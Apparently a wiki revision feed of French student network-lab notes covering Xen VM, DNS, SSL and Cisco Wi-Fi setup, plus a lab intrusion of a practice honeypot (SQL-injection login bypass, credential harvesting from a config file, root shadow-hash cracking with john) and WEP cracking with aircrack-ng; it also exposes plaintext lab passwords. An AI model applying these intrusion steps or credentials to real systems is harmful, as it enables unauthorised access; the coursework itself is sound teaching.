Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:&lt;br /&gt;
!!!!!&lt;br /&gt;
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;br /&gt;
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : &lt;br /&gt;
 &amp;lt;?php&lt;br /&gt;
 ##&lt;br /&gt;
 ## database access settings in php format&lt;br /&gt;
 ## automatically generated from /etc/dbconfig-common/phpmyadmin.conf&lt;br /&gt;
 ## by /usr/sbin/dbconfig-generate-include&lt;br /&gt;
 ##&lt;br /&gt;
 ## by default this file is managed via ucf, so you shouldn't have to&lt;br /&gt;
 ## worry about manual changes being silently discarded.  *however*,&lt;br /&gt;
 ## you'll probably also want to edit the configuration file mentioned&lt;br /&gt;
 ## above too.&lt;br /&gt;
 ##&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='gencovid19';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306';&lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ &lt;br /&gt;
connexion id : root&lt;br /&gt;
mdp: gencovid19&lt;br /&gt;
&lt;br /&gt;
une fois connecter on recherche les identifiants des utilisateurs ssh :&lt;br /&gt;
id = rex &lt;br /&gt;
mdp: &lt;br /&gt;
&lt;br /&gt;
connexion ssh : ssh rex@honey.plil.info&lt;br /&gt;
 /etc/shadow pour trouver la cle de cryptage du mdp root &lt;br /&gt;
 copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::&lt;br /&gt;
 installation de john &lt;br /&gt;
 john nom du fichier&lt;br /&gt;
&lt;br /&gt;
pour aller plus rapidement creer un dictionnaire a partir des indices donnés  : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'&lt;br /&gt;
utiliseer crunch?&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
&lt;br /&gt;
On utilise le paquet aircrack-ng.&lt;br /&gt;
&lt;br /&gt;
La commande&lt;br /&gt;
 airmon-ng&lt;br /&gt;
permet de voir le nom du réseau sans fil: wlan0mon&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On scanne les réseaux :&lt;br /&gt;
 airodump-ng --encrypte wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:capturewep1.png|600px]]&lt;br /&gt;
&lt;br /&gt;
On lance avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -z testwep-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:capturewep2.png|600px]]&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=54494</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=54494"/>
				<updated>2020-12-14T14:07:43Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Sur la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
== Activation connexion ssh ==&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente la ligne PermissionRoot :  &lt;br /&gt;
 # Authentication:&lt;br /&gt;
 #LoginGraceTime 2m&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis on l'active avec la commande :&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
=== Sur Gandi ===&lt;br /&gt;
&lt;br /&gt;
Achat d'un nom de domaine : girolle.site&lt;br /&gt;
Création d'un Glue Record : 193.48.57.182&lt;br /&gt;
&lt;br /&gt;
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)&lt;br /&gt;
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)&lt;br /&gt;
&lt;br /&gt;
=== Sur la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Installation de bind9&lt;br /&gt;
On modifie les fichiers dans /etc/bind/named.conf.&lt;br /&gt;
Dans /etc/bind/named.conf.options&lt;br /&gt;
 options {&lt;br /&gt;
   directory &amp;quot;/etc/bind&amp;quot;;&lt;br /&gt;
   listen-on-v6 { any; };&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;girolle.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;girolle.site/girolle&amp;quot;;&lt;br /&gt;
   allow-transfer (217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans db.girolle.site&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.girolle.site.  postmaster.girolle.site(&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.girolle.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.182&lt;br /&gt;
 @       IN      MX      100 girolle.site.&lt;br /&gt;
&lt;br /&gt;
www      IN      CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
Puis pour le relancer :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration pour la réception du mail de confirmation du certificat SSL&lt;br /&gt;
Installer Postfixe pour avoir accès au fichier aliases&lt;br /&gt;
 Internet Site&lt;br /&gt;
 girolle.site&lt;br /&gt;
&lt;br /&gt;
Dans /etc/aliases&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Puis ajouter dans newaliases&lt;br /&gt;
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site&lt;br /&gt;
&lt;br /&gt;
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Installation de mailx pour lire les mails reçus&lt;br /&gt;
 apt-install bsd-mailx&lt;br /&gt;
Pour consulter le mail de vérification&lt;br /&gt;
 mailx admin&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation par certificat SSL ===&lt;br /&gt;
&lt;br /&gt;
Génération du CSR à l'aide d'openssl&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout girolle.site.key -out girolle.site.csr&lt;br /&gt;
&lt;br /&gt;
Réception du mail de vérification avec une URL et un mot de passe ce qui nous permet de récupérer le fichier girolle.site.crt&lt;br /&gt;
&lt;br /&gt;
Configuration du serveur apache2&lt;br /&gt;
&lt;br /&gt;
Activation du ssl sur apache2 &lt;br /&gt;
 ae2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier 000-default.conf dans /etc/apache2/sites-available&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                                                         &lt;br /&gt;
  ServerName www.girolle.site                                                                                             &lt;br /&gt;
  Redirect / https://www.girolle.site       &lt;br /&gt;
  ....                                                                        &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.182:443&amp;gt;&lt;br /&gt;
     DocumentRoot /var/www/html2&lt;br /&gt;
     ServerName girolle.site&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/girolle.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/girolle.site.key&lt;br /&gt;
         SSLCertificateChainFile /root/GandiCA.pem&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Commandes et verifications /&lt;br /&gt;
ap(config)#interface BVI1&lt;br /&gt;
ap(config-if)# ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
ap(config-if)#exit&lt;br /&gt;
ap#write&lt;br /&gt;
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION&lt;br /&gt;
ap#ping 10.60.100.2 &lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:&lt;br /&gt;
.!!!!&lt;br /&gt;
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
test second routeur : ne fonctionne pas car pas d'addresse ip&lt;br /&gt;
ap#ping 10.60.100.1&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:&lt;br /&gt;
.....&lt;br /&gt;
Success rate is 0 percent (0/5)&lt;br /&gt;
&lt;br /&gt;
Configurer l'adresse par defaut:&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2&lt;br /&gt;
ap(config)#exit&lt;br /&gt;
ap#sh ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test ping notre machine virtuelle girolle : &lt;br /&gt;
ap#ping 193.48.57.182&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:&lt;br /&gt;
!!!!!&lt;br /&gt;
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;br /&gt;
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : &lt;br /&gt;
 &amp;lt;?php&lt;br /&gt;
 ##&lt;br /&gt;
 ## database access settings in php format&lt;br /&gt;
 ## automatically generated from /etc/dbconfig-common/phpmyadmin.conf&lt;br /&gt;
 ## by /usr/sbin/dbconfig-generate-include&lt;br /&gt;
 ##&lt;br /&gt;
 ## by default this file is managed via ucf, so you shouldn't have to&lt;br /&gt;
 ## worry about manual changes being silently discarded.  *however*,&lt;br /&gt;
 ## you'll probably also want to edit the configuration file mentioned&lt;br /&gt;
 ## above too.&lt;br /&gt;
 ##&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='gencovid19';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306';&lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ &lt;br /&gt;
connexion id : root&lt;br /&gt;
mdp: gencovid19&lt;br /&gt;
&lt;br /&gt;
une fois connecter on recherche les identifiants des utilisateurs ssh :&lt;br /&gt;
id = rex &lt;br /&gt;
mdp: &lt;br /&gt;
&lt;br /&gt;
connexion ssh : ssh rex@honey.plil.info&lt;br /&gt;
 /etc/shadow pour trouver la cle de cryptage du mdp root &lt;br /&gt;
 copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::&lt;br /&gt;
 installation de john &lt;br /&gt;
 john nom du fichier&lt;br /&gt;
&lt;br /&gt;
pour aller plus rapidement creer un dictionnaire a partir des indices donnés  : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'&lt;br /&gt;
utiliseer crunch?&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
&lt;br /&gt;
On utilise le paquet aircrack-ng.&lt;br /&gt;
&lt;br /&gt;
La commande&lt;br /&gt;
 airmon-ng&lt;br /&gt;
permet de voir le nom du réseau sans fil: wlan0mon&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On scanne les réseaux :&lt;br /&gt;
 airodump-ng --encrypte wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:capturewep1.png|600px]]&lt;br /&gt;
&lt;br /&gt;
On lance avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -z testwep-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:capturewep2.png|600px]]&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53819</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53819"/>
				<updated>2020-11-16T17:28:09Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
== Activation connexion ssh ==&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente la ligne PermissionRoot :  &lt;br /&gt;
 # Authentication:&lt;br /&gt;
 #LoginGraceTime 2m&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis on l'active avec la commande :&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
=== Sur Gandi ===&lt;br /&gt;
&lt;br /&gt;
Achat d'un nom de domaine : girolle.site&lt;br /&gt;
Création d'un Glue Record : 193.48.57.182&lt;br /&gt;
&lt;br /&gt;
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)&lt;br /&gt;
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)&lt;br /&gt;
&lt;br /&gt;
=== Sur la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Installation de bind9&lt;br /&gt;
On modifie les fichiers dans /etc/bind/named.conf.&lt;br /&gt;
Dans /etc/bind/named.conf.options&lt;br /&gt;
 options {&lt;br /&gt;
   directory &amp;quot;/etc/bind&amp;quot;;&lt;br /&gt;
   listen-on-v6 { any; };&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;girolle.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;girolle.site/girolle&amp;quot;;&lt;br /&gt;
   allow-transfer (217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans db.girolle.site&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.girolle.site.  postmaster.girolle.site(&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.girolle.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.182&lt;br /&gt;
 @       IN      MX      100 girolle.site.&lt;br /&gt;
&lt;br /&gt;
Puis pour le relancer :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration pour la réception du mail de confirmation du certificat SSL&lt;br /&gt;
Installer Postfixe pour avoir accès au fichier aliases&lt;br /&gt;
 Internet Site&lt;br /&gt;
 girolle.site&lt;br /&gt;
&lt;br /&gt;
Dans /etc/aliases&lt;br /&gt;
 admin: root&lt;br /&gt;
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site&lt;br /&gt;
&lt;br /&gt;
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Commandes et verifications /&lt;br /&gt;
ap(config)#interface BVI1&lt;br /&gt;
ap(config-if)# ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
ap(config-if)#exit&lt;br /&gt;
ap#write&lt;br /&gt;
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION&lt;br /&gt;
ap#ping 10.60.100.2 &lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:&lt;br /&gt;
.!!!!&lt;br /&gt;
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
test second routeur : ne fonctionne pas car pas d'addresse ip&lt;br /&gt;
ap#ping 10.60.100.1&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:&lt;br /&gt;
.....&lt;br /&gt;
Success rate is 0 percent (0/5)&lt;br /&gt;
&lt;br /&gt;
Configurer l'adresse par defaut:&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2&lt;br /&gt;
ap(config)#exit&lt;br /&gt;
ap#sh ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test ping notre machine virtuelle girolle : &lt;br /&gt;
ap#ping 193.48.57.182&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:&lt;br /&gt;
!!!!!&lt;br /&gt;
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
